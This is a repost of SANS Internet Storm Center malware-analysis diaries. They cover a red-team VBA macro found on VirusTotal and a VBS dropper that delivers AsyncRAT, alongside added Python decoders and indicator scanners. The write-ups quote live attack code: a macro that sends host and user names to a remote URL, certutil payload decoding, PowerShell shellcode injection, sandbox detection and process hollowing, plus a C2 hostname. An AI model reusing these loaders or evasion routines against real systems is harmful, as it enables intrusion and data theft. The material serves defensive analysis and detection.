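    for hit in find_stager_uris(SAMPLE_LOG):
        print(hit)
    key = guess_single_byte_xor_key(SAMPLE_BLOB)
    print(f"recovered key 0x{key:02x}:", xor_bytes(SAMPLE_BLOB, key).replace(b"\x00", b"."))
```

The checksum refinement matters in practice because plenty of legitimate sites serve four-character paths; combining the length filter with the checksum test cuts the false positives down to something an analyst can review by hand before reaching for a beacon parser.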

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com


Spotting the Red Team on VirusTotal!, (Sat, Mar 6th)

Many security researchers like to use the VirusTotal platform. The services provided are amazing: you can immediately have a clear overview of how dangerous a file is, but… VirusTotal remains a cloud service. That means that once you have uploaded a file to scan it, you have to consider it “lost” and available to a lot of (good or bad) people! In the SANS FOR610 training (“Reverse Engineering Malware”), we insist on the fact that you should avoid uploading a file to VT!  The best practice is to compute the file hash and then search for it to see if someone else already uploaded the same sample. If you’re the first to upload a file, its creator can be notified about the upload and learn that he has been detected. Don’t be fooled: attackers also have access to VirusTotal and monitor activity around their malware! Note that I mention VirusTotal because it is very popular, but it is not the only service providing repositories of malicious files; there are plenty of alternative services to scan and store malicious files.

Another way to use those online services is to “hunt”. That’s what I’m doing with most of the samples that I analyze in my diaries. If you are working on the defensive side (or in a Blue team), my advice is to keep an eye on data related to your business or organization via OSINT sources. Sometimes you can find interesting information and stay one step ahead of the attacker or… the Red team you hired to test your infrastructure!

I spotted a nice VBS macro that seems to be related to a Red team exercise. I won’t disclose the hash and the script here because it contains sensitive information:

  • URLs with the domain of the company performing the security assessment
  • Public IP addresses used for reverse shells
  • Internal resources about the targeted infrastructure (apparently, the reconnaissance phase was already completed)

Here are some pieces of interesting code:

The entry point of the macro already discloses some fun:

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
  'php rev shell and others...
  Document_Open2
  ...

Let’s start with some data sent back to the attacker:

Private Sub Document_Open2()
On Error Resume Next
  uID = Environ("COMPUTERNAME") & "B3" & Environ("USERNAME")
  SavePath = Environ("TEMP") & "tempB2" & Int((9999 - 1000 + 1) * Rnd + 1000)
  CanSend = 0
  sendSystemInfo "http://www.xxxxxxxx.com/sp/index.php?id=" & uID, CanSend
  openShell
End Sub

The domain used in the URL (obfuscated) is the domain of the security company performing the tests!

They obfuscate a script in a fake certificate and decode it with certutil.exe (classic TTP):

x = x & "-----BEGIN CERTIFICATE-----"
x = x & "JGxpbmVzID0gaXBjb25maWcgI3NhdmUgb3V0cHV0IG9mIGNvbW1hbmQgdG8gdmFy"
x = x & "aWFibGUgJGxpbmVzDQokbGluZXMgPSAkbGluZXMgKyAoY21kLmV4ZSAvYyBuZXQg"
x = x & "aG9zdG5hbWUpDQokbGluZXMgPSAkbGluZXMgKyAoY21kLmV4ZSAvYyBuZXQgc2hh"
[...Data removed...]
x = x & "ICRsaW5lICsgIi5pbG10LnVzIg0KICAgICRhcnJheSA9ICRhcnJheSArICRsaW5l"
x = x & "ICNhZGQgdGhlIHZhbHVlIHRvIG91ciBhcnJheQ0KfQ0KDQpmb3IgKCRpID0gMDsg"
x = x & "JGkgLWx0ICRhcnJheS5sZW5ndGg7ICRpKyspIHsNCiAgICBwaW5nICRhcnJheVsk"
x = x & "aV0NCn0="
x = x & "-----END CERTIFICATE-----"

objFile.Write x & vbCrLf
objFile.Close
Shell ("cmd /k certutil -decode " & outFile & " " & inFile), vbHide
Shell (Final & inFile), vbHide
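As an added example (my own code, not the macro's and not the diary's), a triage routine for the "script hidden in a fake certificate" pattern shown above: it rebuilds the string a macro assembles with repeated `x = x & "..."` lines, base64-decodes every BEGIN/END CERTIFICATE block, and asks whether the result is actually DER-encoded (a real certificate starts with a SEQUENCE tag whose length covers the whole blob) or smuggled text. The macro snippet and the stand-in certificate are constructed; the DER check is a structural heuristic, not a full X.509 parse.

```python
import base64
import re

PEM_BLOCK = re.compile(r"-----BEGIN CERTIFICATE-----\s*(.*?)\s*-----END CERTIFICATE-----", re.S)
VBA_CONCAT = re.compile(r'^\s*x\s*=\s*x\s*&\s*"([^"]*)"\s*$', re.M | re.I)


def vba_concat_to_text(script: str) -> str:
    """Rebuild the string the macro assembles with repeated `x = x & "..."` lines."""
    return "".join(VBA_CONCAT.findall(script))


def pem_payloads(text: str):
    """Base64-decode every BEGIN/END CERTIFICATE block; None marks undecodable ones."""
    blobs = []
    for m in PEM_BLOCK.finditer(text):
        try:
            blobs.append(base64.b64decode(re.sub(r"\s+", "", m.group(1)), validate=True))
        except ValueError:          # binascii.Error is a ValueError subclass
            blobs.append(None)
    return blobs


def looks_like_der_certificate(blob: bytes) -> bool:
    """A real X.509 certificate is a DER SEQUENCE: tag 0x30, then a length that
    covers the rest of the blob (short form, or long form 0x81/0x82)."""
    if len(blob) < 2 or blob[0] != 0x30:
        return False
    first = blob[1]
    if first < 0x80:
        length, header = first, 2
    elif first == 0x81 and len(blob) >= 3:
        length, header = blob[2], 3
    elif first == 0x82 and len(blob) >= 4:
        length, header = int.from_bytes(blob[2:4], "big"), 4
    else:
        return False
    return header + length == len(blob)


def classify_pem_blocks(text: str):
    """One verdict per block: 'certificate', 'text-payload', 'binary-payload'
    or 'invalid-base64'."""
    verdicts = []
    for blob in pem_payloads(text):
        if blob is None:
            verdicts.append("invalid-base64")
        elif looks_like_der_certificate(blob):
            verdicts.append("certificate")
        else:
            printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in blob) / max(len(blob), 1)
            verdicts.append("text-payload" if printable > 0.95 else "binary-payload")
    return verdicts


def _pem(body: bytes) -> str:
    return ("-----BEGIN CERTIFICATE-----" + base64.b64encode(body).decode()
            + "-----END CERTIFICATE-----")


# Constructed samples: a harmless one-line script wrapped as a "certificate" and split
# into x = x & "..." lines the way the macro does it, and a minimal DER SEQUENCE
# (0x30, two-byte length) standing in for a genuine certificate.
FAKE_CERT_MACRO = "\n".join(
    'x = x & "' + part + '"'
    for part in re.findall(r".{1,64}", _pem(b"Write-Output 'constructed sample'\r\n")))
REAL_CERT_TEXT = _pem(b"\x30\x82\x00\x10" + b"\x02\x01\x01" + b"\x00" * 13)

if __name__ == "__main__":
    print(classify_pem_blocks(vba_concat_to_text(FAKE_CERT_MACRO)))   # ['text-payload']
    print(classify_pem_blocks(REAL_CERT_TEXT))                         # ['certificate']
```

The same classifier works on files dropped to disk: anything certutil -decode is pointed at that is not DER is worth a look, and the printable-ratio test separates scripts from packed binaries without decoding either further.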

The next technique implemented is the exfiltration of data via HTTPS. They perform this with shellcode injected into a PowerShell thread:

$1 = '$c = ''
[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';
$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;
[Byte[]];
[Byte[]]$z = 0xbe,0x57,0xed,0x7b,0x36,0xda, [...Data Removed...],0x2e,0xd9,0x1b,0x87,0xf2;
$g = 0x1000;
if ($z.Length -gt 0x1000) {
  $g = $z.Length};
  $x=$w::VirtualAlloc(0,0x1000,$g,0x40);
  for ($i=0;$i -le ($z.Length-1);$i++) {
    $w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};
    $w::CreateThread(0,0,$x,0,0,0);
    for (;;) {
       Start-sleep 60
    };'
  ;
$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));
$2 = "-enc ";
if([IntPtr]::Size -eq 8) {
  $3 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";
  iex "& $3 $2 $e"
}
else {;
  iex "& powershell $2 $e";
}

Here is the shellcode:

The injected shellcode connects to a Comcast public IP address that, when accessed manually, implements a redirect to… the website of the company 🙂

[email protected]:/MalwareZoo/20210305$ curl http://x.x.x.x

    window.location.href = "https://xxxxxxxx.com";

To conclude:

  • If you’re a defender, I hope this example demonstrates to you the importance of implementing OSINT techniques to spot attackers and learn what can be in the pipe.
  • If you’re an attacker, well, do not use your corporate domain! Cover your tracks as much as possible and don’t upload your scripts on VirusTotal.

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key


From VBS, PowerShell, C Sharp, Process Hollowing to RAT, (Thu, Mar 4th)

VBS files are interesting for delivering malicious content to a victim’s computer because they look like simple text files. I found an interesting sample that behaves like a dropper. It also looks like Russian dolls, given all the techniques used to drop a RAT at the end. The file hash is 8697dc74d7c07583f24488926fc6e117975f8a9f014972073d19a5e62d248ead and it has a VT score of 12/59[1]. It was delivered by email under the name “Procurement – Attached RFQ 202102.vbs”. If you filter attachments based on the MIME type, this file won’t be detected as suspicious:

[email protected]:/MalwareZoo/20210303$ file *.vbs
Procurement - Attached RFQ 202102.vbs: ASCII text, with very long lines, with CRLF line terminators

When you try to open a .vbs file on a standard Windows system, it is processed by the “Microsoft ® Windows Based Script Host” handlers. Here is the code executed when you open this script:

Private Function vQ(Inp, Key, Mode)
    Dim z, i, Position, cptZahl, orgZahl, keyZahl, cptString
    For i = 1 To lEn(Inp)
        Position = Position + 1
        If Position > lEn(Key) Then Position = 1
        keyZahl = aSc(Mid(Key, Position, 1))
        If Mode Then
            ' Mode = True: encode one character per iteration, emitted as two hex digits
            orgZahl = aSc(Mid(Inp, i, 1))
            cptZahl = orgZahl Xor keyZahl
            cptString = hEx(cptZahl)
            ' The "<", ">" and "\" characters on the next lines were lost when the page
            ' was extracted (they were read as HTML) and are restored here.
            If lEn(cptString) < 2 Then cptString = "0" & cptString
            z = z & cptString
        Else
            ' Mode = False (as called below): decode two hex digits per iteration
            If i > lEn(Inp) \ 2 Then Exit For
            cptZahl = CByte("&" & "H" & Mid(Inp, i * 2 - 1, 2))
            orgZahl = cptZahl Xor keyZahl
            z = z & cHR(orgZahl)
        End If
    Next
    vQ = z
End Function

Dim AqUhNbgAqwpMb
AqUhNbgAqwpMb = "[...encoded payload removed...]"

Dim SH
SH = cHR(80 + 7) & cHR(100 + 15) & cHR(66 + 1) & cHR(80 + 2) & cHR(110 - 5) & cHR(85 - 5) & cHR(80 + 4) & cHR(40 + 6) & cHR(230 / 2) & cHR(36 * 2) & cHR(60 + 9) & cHR(100 + 8) & cHR(70 + 6)
Set WS = CreateObject(SH)
Set FSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = FSO.CreateTextFile(FSO.GetSpecialFolder(2) + "\OS64Bits.PS1", True)
MyFile.WriteLine(rEPlAcE(vQ(AqUhNbgAqwpMb, "p2O)6[.X0sI^{p(@5wAC|/Gh]N{am}3+(rNY3]>UK|/2_YlCUfqK{hZL*.NawX9G>:x.I", False), "%VBS%", wscript.SCRIPTFULLNAME))
MyFile.Close
WS.rUN "POWERSHELL -eXEcUTiONpOLicY rEmOtEsIgNeD -FILE " & FSO.GetSpecialFolder(2) + "\OS64Bits.PS1", 0

The payload is stored in AqUhNbgAqwpMb and decoded by vQ(), an XOR decoder using a multi-byte key. The decoded payload is dropped on the filesystem (C:\Users\<user>\AppData\Local\Temp\OS64Bits.PS1) and executed by PowerShell. This script is interesting on multiple points.

First, most suspicious strings are obfuscated and binary encoded. Decoding is performed via a specific function:

Function Binary2String([String] $data) {
    $byteList = [System.Collections.Generic.List[Byte]]::new()
    for ($i = 0; $i -lt $data.Length; $i +=8) {
        $byteList.Add([Convert]::ToByte($data.Substring($i, 8), 2))
    }
    return [System.Text.Encoding]::ASCII.GetString($byteList.ToArray())
}
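The three obfuscation layers shown so far (the hex-plus-repeating-key XOR of vQ(), the arithmetic Chr() concatenation that builds the COM ProgID, and the PowerShell Binary2String()) are the kind of thing an analyst wants to reverse from a script without running any of it. As an added example (my own code, not the dropper's and not the diary's), here are Python ports of all three. The Chr() expression is the one from the dropper above; the XOR key and plaintext used for the round trip are constructed, and the arithmetic is evaluated with a tiny AST walker rather than eval() so that an attacker-supplied expression cannot run code.

```python
import ast
import operator
import re


def vq(inp: str, key: str, mode: bool) -> str:
    """Port of the dropper's vQ(): repeating-key XOR.  mode=True turns text into
    two-digit upper-case hex; mode=False (what the dropper calls) reverses it.
    The key position advances once per input character when encoding and once
    per hex pair when decoding, exactly as the VBScript loop does."""
    out, pos = [], 0
    if mode:
        for ch in inp:
            pos = pos % len(key) + 1                 # 1-based, wraps like the VBScript
            out.append(f"{ord(ch) ^ ord(key[pos - 1]):02X}")
    else:
        for i in range(len(inp) // 2):
            pos = pos % len(key) + 1
            out.append(chr(int(inp[2 * i:2 * i + 2], 16) ^ ord(key[pos - 1])))
    return "".join(out)


_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
        ast.Mult: operator.mul, ast.Div: operator.truediv}


def _eval_arith(expr: str):
    """Evaluate a tiny arithmetic expression (numbers and + - * /) without eval()."""
    def walk(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError(f"unsupported expression: {expr!r}")
    return walk(ast.parse(expr.strip(), mode="eval").body)


def decode_chr_concat(vbs_expr: str) -> str:
    """Resolve `Chr(80 + 7) & Chr(...) & ...` (any letter case) into the string it builds."""
    return "".join(chr(int(_eval_arith(arg)))
                   for arg in re.findall(r"chr\(([^)]*)\)", vbs_expr, re.I))


def binary2string(bits: str) -> str:
    """Port of the PowerShell Binary2String(): eight binary digits per character."""
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, len(bits), 8))


# The ProgID expression from the dropper (copied from the diary).
SH_EXPR = ('cHR(80 + 7) & cHR(100 + 15) & cHR(66 + 1) & cHR(80 + 2) & cHR(110 - 5) & '
           'cHR(85 - 5) & cHR(80 + 4) & cHR(40 + 6) & cHR(230 / 2) & cHR(36 * 2) & '
           'cHR(60 + 9) & cHR(100 + 8) & cHR(70 + 6)')

# Constructed round trip: encode with a constructed key, then decode the way the dropper does.
SAMPLE_KEY = "p2O)6[.X0sI^{p(@"
SAMPLE_PLAIN = "Write-Output 'constructed %VBS% sample'"
SAMPLE_HEX = vq(SAMPLE_PLAIN, SAMPLE_KEY, True)

if __name__ == "__main__":
    print(decode_chr_concat(SH_EXPR))                 # WsCRiPT.sHElL
    print(SAMPLE_HEX)
    print(vq(SAMPLE_HEX, SAMPLE_KEY, False))
    print(binary2string("".join(f"{ord(c):08b}" for c in "Get-Process")))
```

Having the encoder as well as the decoder is deliberate: it lets you confirm the port is faithful by round-tripping, and it is the quickest way to recognise the scheme again when the next sample renames vQ() and changes the key.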

There is a detection mechanism of virtual environments:

Function VirtualMachineDetector() {
    $searcher = (New-Object System.Management.ManagementObjectSearcher("Select * from Win32_ComputerSystem"))
    $items = $searcher.Get()
    $Tr = ""
    foreach ($item in $items) {
        [String] $manufacturer = $item["Manufacturer"].ToString().ToLower()
        if (($manufacturer -eq "microsoft corporation" -and 
           $item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) -or 
           $manufacturer.Contains("vmware") -or $item["Model"].ToString() -eq "VirtualBox") {
             $Tr = "True"
        } else {
             $Tr = "False"
        }
     }
     return $Tr
}

Note also the presence of a function to detect Sandboxie[2], another sandbox tool that is easy to spot by checking for the DLL SbieDll.dll:

Function DetectSandboxie() {
    [Int32] $i = ModuleHandle("SbieDll.dll")
    [String] $s = ""
    if ($i -eq 0) {
        $s = "False"
    } else {
        $s = "True"
    }
    return $s
}

The most interesting function is CodeDom. It invokes the CSharp compiler to compile the next payload:

function CodeDom([Byte[]] $BB, [String] $TP, [String] $MT) {
    # Compile C# source at run time with the .NET 4.0 CodeDom provider
    $dictionary = new-object 'System.Collections.Generic.Dictionary[[string],[string]]'
    $dictionary.Add(("CompilerVersion"), ("v4.0"))
    $CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary)
    $CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters
    $CompilerParametres.ReferencedAssemblies.Add(("System.dll"))
    $CompilerParametres.ReferencedAssemblies.Add(("System.Management.dll"))
    $CompilerParametres.ReferencedAssemblies.Add(("System.Windows.Forms.dll"))
    $CompilerParametres.ReferencedAssemblies.Add(("mscorlib.dll"))
    $CompilerParametres.ReferencedAssemblies.Add(("Microsoft.VisualBasic.dll"))
    $CompilerParametres.IncludeDebugInformation = $false
    $CompilerParametres.GenerateExecutable = $false
    # The assembly never touches disk; /unsafe permits pointer code, /platform:X86 matches the 32-bit target below
    $CompilerParametres.GenerateInMemory = $true
    $CompilerParametres.CompilerOptions += ("/platform:X86 /unsafe /target:library")

    # $BB holds the compressed C# source (see Pastebin[3])
    $BB = Decompress($BB)

    [System.CodeDom.Compiler.CompilerResults] $CompilerResults =
       $CsharpCompiler.CompileAssemblyFromSource($CompilerParametres,
       [System.Text.Encoding]::Default.GetString($BB))

    [Type] $T = $CompilerResults.CompiledAssembly.GetType($TP)

    # Compressed PE payload (31,139 is the gzip magic); this is the AsyncRAT sample
    [Byte[]] $Bytes =  Decompress(@(
      31,139,8,0,0,0,0,0,4,0,180,189,7,124,92,213,149,63,126,231,77,213,168,206,168,203,18,150,139,204,216,
      198,178,138,37,75,6,131,213,45,219,178,213,108,75,14,193,140,164,145,52,246,72,79,158,25,201,150,13,
      142,197,2,129,36,180,116,88,146,80,194,166,146,132,36,155,182,41,56,
      # (bytes removed)
      61,237,1,92,113,253,243,0,180,0,0))

    try {
        # Path of the 32-bit InstallUtil.exe, the legitimate process that gets hollowed
        [String] $MyPt =
        [System.IO.Path]::Combine([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory(),
         "InstallUtil.exe")
        [Object[]] $Params = @($MyPt.Replace("Framework64","Framework"), $Bytes)
        # Invoke the static method $MT of type $TP with (target path, payload bytes)
        return $T.GetMethod($MT).Invoke($null, $Params)
    } catch { }
}

The CSharp code is located in the variable BB (I posted the code on Pastebin[3]). Looking at the code, we can see a bunch of interesting API calls:

private static readonly DelegateVirtualAllocEx VirtualAllocEx = LoadApi(ReverseString(Kernel32), ReverseString(VirtualAllcEx)); 
private static readonly DelegateWriteProcessMemory WriteProcessMemory = LoadApi(ReverseString(Kernel32), ReverseString(WriteProcessMem)); 
private static readonly DelegateReadProcessMemory ReadProcessMemory = LoadApi(ReverseString(Kernel32), ReverseString(ReadProcessMem)); 
private static readonly DelegateZwUnmapViewOfSection ZwUnmapViewOfSection = LoadApi(ReverseString(ntdll), ReverseString(ZwUnmapViewOfSec)); 
private static readonly DelegateCreateProcessA CreateProcessA = LoadApi(ReverseString(Kernel32), ReverseString(CreateProcA));

This clearly indicates that process hollowing is used to replace the code of a legitimate process with malicious code. This code is located in the variable Bytes and is a PE file (SHA256: D452CEE94E3A2D58B05E9F62A4AA4004C0632D9B56FA8B57664D295BC88C4DF0) that tries to communicate with a C2 server located at asin8989.ddns.net on port 8989. The malware belongs to the AsyncRAT[4] family.
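With PowerShell script block logging enabled, the dropped script's text (including the CodeDom setup, the WMI sandbox check and the SbieDll.dll lookup) ends up in the event log, and the C# source, once decompressed, carries the reversed API names. The Python below is an added example for this diary, not code from the ISC or from the sample: it scores a script text against the indicators visible on this page, checking each one both verbatim and reversed because the sample's C# stores API names with ReverseString. It covers the VM/Sandboxie detection passages as well as the CodeDom and hollowing passages, and the script-block and C# fragments are constructed from the lines quoted above, not captured logs.

```python
"""Indicator scan for the dropped script and its compiled C# stage (added example)."""
from typing import Dict, List

# Indicators taken from the script quoted in this diary, grouped by behaviour.
INDICATORS: Dict[str, List[str]] = {
    "sandbox-evasion": ["Win32_ComputerSystem", "VirtualBox", "vmware", "SbieDll.dll"],
    "in-memory-compile": ["CSharpCodeProvider", "CompileAssemblyFromSource",
                          "GenerateInMemory", "/unsafe"],
    "hollowing-target": ["InstallUtil.exe"],
    "hollowing-apis": ["VirtualAllocEx", "WriteProcessMemory", "ReadProcessMemory",
                       "ZwUnmapViewOfSection", "CreateProcessA"],
}


def find_indicators(text: str) -> Dict[str, List[str]]:
    """Per behaviour group, the indicators present verbatim or reversed (case-insensitive)."""
    lowered = text.lower()
    hits: Dict[str, List[str]] = {}
    for group, names in INDICATORS.items():
        found = []
        for name in names:
            forward = name.lower() in lowered
            reverse = name[::-1].lower() in lowered
            if forward or reverse:
                found.append(name + ("" if forward else " (reversed)"))
        if found:
            hits[group] = found
    return hits


def verdict(text: str) -> bool:
    """Flag when two behaviours co-occur, or when most of the hollowing API set is present.

    A single group is deliberately not enough: Add-Type compiles C# in memory via the same
    CodeDom provider, and inventory scripts query Win32_ComputerSystem all day long.
    """
    hits = find_indicators(text)
    return len(hits) >= 2 or len(hits.get("hollowing-apis", [])) >= 3


# Constructed script-block text, assembled from lines quoted in the diary.
SAMPLE_SCRIPT_BLOCK = r'''
$CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary)
$CompilerParametres.GenerateInMemory = $true
$CompilerParametres.CompilerOptions += ("/platform:X86 /unsafe /target:library")
$searcher = (New-Object System.Management.ManagementObjectSearcher("Select * from Win32_ComputerSystem"))
[Int32] $i = ModuleHandle("SbieDll.dll")
[String] $MyPt = [System.IO.Path]::Combine($rt, "InstallUtil.exe")
'''

# Constructed C# fragment modelled on the ReverseString pattern (string values are reversed API names).
SAMPLE_CSHARP = r'''
private const string VirtualAllcEx = "xEcollAlautriV";
private const string WriteProcessMem = "yromeMssecorPetirW";
private const string ZwUnmapViewOfSec = "noitceSfOweiVpamnUwZ";
'''

# Constructed benign admin script: one group only, must not be flagged.
BENIGN_SCRIPT = 'Add-Type -TypeDefinition $src\nGet-WmiObject Win32_ComputerSystem | Select Model'

if __name__ == "__main__":
    for label, text in (("script block", SAMPLE_SCRIPT_BLOCK), ("csharp", SAMPLE_CSHARP), ("benign", BENIGN_SCRIPT)):
        print(label, verdict(text), find_indicators(text))
```

The reversed-string check matters: grepping the C# for `VirtualAllocEx` finds nothing, while the same name spelled backwards is right there in a constant. The two-group threshold keeps ordinary `Add-Type` and WMI inventory scripts out of the alert queue.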

Note: My advice to protect yourself against such malicious .vbs files is to change the default application that opens them to notepad.exe.

[1] https://www.virustotal.com/gui/file/8697dc74d7c07583f24488926fc6e117975f8a9f014972073d19a5e62d248ead/detection
[2] https://github.com/sandboxie-plus/sandboxie
[3] https://pastebin.com/cW25WEpY
[4] https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS.